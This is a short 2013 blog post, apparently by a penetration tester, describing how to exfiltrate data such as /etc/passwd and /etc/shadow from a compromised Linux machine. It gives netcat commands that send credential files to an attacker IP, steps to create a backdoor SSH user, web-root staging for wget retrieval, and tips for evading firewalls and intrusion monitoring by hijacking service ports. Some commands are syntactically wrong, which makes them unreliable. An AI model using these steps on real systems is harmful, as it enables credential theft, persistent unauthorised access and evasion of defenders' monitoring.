Pages

Sunday, February 10, 2013

Basic Data Exfiltration

So you pwned the system and got root access, awesome but what's next? Oh, I need to get the /etc/passwd and /etc/shadow out for a start. Ok how?

There are a couple of ways to do it:
1. Meterpreter's 'download' command
It's great if you're using meterpreter as the payload. Simple and hassle free. Just 'cd' and 'pwd' through the victim machine's directory without having to worry about the OS platform. But the limitation is if you are not using metasploit to pwn your victim machine, then you can't do this.

2. Netcat
Meow! Using this network utility to do a transfer of a binary file is definitely a viable option. 
All you'll need to do is:

Attacking Machine:~/goodies_folder/# nc -l -p 4444 > file_i_am_stealing.ext

Victim Machine:~/etc/# cat passwd | nc 192.168.1.200 passwd
* 192.168.1.200 is, of course, the attacker's machine IP address

Let's say the machine you've compromised has a host-based firewall that whitelist ports and deny all others, there are two ways to circumvent this:
- Tweak the iptable <= Not recommended, coz' you're changing critical configuration of the host machine. I wouldn't want to trigger the IPS or FIM monitoring this victim machine :S
- Shut down a service and hijack the port. <= Say XYZ service is a pretty much unused but available listening on port 112. Shut down the XYZ service, perform the exfil and then turn it back up. 

3. SSH
If the SSH daemon is up, create a new user e.g. ted
Victim Machine:~/# /usr/sbin/useradd ted
 Victim Machine:~/# /usr/bin/passwd ted
* Set your password 
Victim Machine:~/# echo >> /etc/ssh/sshd_config AllowUsers ted
Remember to do a netstat -tulpn | grep sshd to make sure that the SSH service is up.

Attacker's Machine:~/# ssh ted@192.168.1.100 password123
4. wget
Good if your victim's machine has a apache webserver up and running.
Simply copy all the files you wanna exfil to /var/www/html
and then:

Attacker's machine:~/# wget http://192.168.1.100 file_you_wanna_retrieve.ext 
Again, you want to make sure that your Apache is running ;)

5. Other ways
There are a couple of more ways but I need to run already, so here's some brief mentions:
- FTP <-- Set up FTP and SCP your way files through
- Covert Channels <-- You can craft ICMP packets and fit your data inside. Haven't tried it yet, but will blog it when I do.
- Email <-- It's lame, but if you got startx or you've VNC-ed into your victim's machine, you can exfil through web browsers =D

Alrighty, hope these helps. Gotta run. Happy fun times~

Break To Protect,
J.S. 

No comments:

Post a Comment